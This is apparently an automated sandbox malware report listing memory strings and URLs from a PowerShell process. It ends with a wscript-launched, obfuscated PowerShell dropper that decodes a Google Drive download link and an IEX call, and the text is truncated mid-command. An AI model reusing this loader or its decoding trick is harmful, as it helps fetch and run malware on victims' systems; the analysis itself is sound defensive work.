Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb= source: powershell.exe, 00000002.00000002.1679719190.000001E9B2511000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1678372336.000001E9B21D8000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1679719190.000001E9B24BF000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000002.00000002.1679517302.000001E9B2498000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1679719190.000001E9B24E1000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: pdblib.pdbXt source: powershell.exe, 00000002.00000002.1646651748.000001E9983A1000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: em.Core.pdbP source: powershell.exe, 00000002.00000002.1678372336.000001E9B21D8000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb1 source: powershell.exe, 00000002.00000002.1678372336.000001E9B21D8000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.1679719190.000001E9B2511000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb#e source: powershell.exe, 00000002.00000002.1679517302.000001E9B2498000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000002.00000002.1646952712.000001E99BBD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000002.00000002.1646952712.000001E99BAE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BF1C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.1675040030.000001E9A9D9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.1646952712.000001E999F57000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.1646952712.000001E999D31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000002.00000002.1646952712.000001E999F57000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.1646952712.000001E999D31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000002.00000002.1646952712.000001E99A1C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.1646952712.000001E99BAAA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googPb |
Source: powershell.exe, 00000002.00000002.1646952712.000001E99BBD6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googPzm |
Source: powershell.exe, 00000002.00000002.1646952712.000001E99BBD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E999F57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99B9FD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000002.00000002.1646952712.000001E999F57000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0DyP |
Source: powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googhko |
Source: powershell.exe, 00000002.00000002.1646952712.000001E99BF1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.1646952712.000001E99A1C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A2DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BACC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BF1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy&export=download |
Source: powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.comD=620 |
Source: powershell.exe, 00000002.00000002.1646952712.000001E999F57000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.1646952712.000001E99B05F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.1675040030.000001E9A9D9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.1646952712.000001E99A1C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000002.00000002.1646952712.000001E99A1C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000002.00000002.1646952712.000001E99A1C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000002.00000002.1646952712.000001E99A1C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000002.00000002.1646952712.000001E99A1C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If ($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets -lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1 Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla: Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki ';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin ';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous (Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+ S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESus |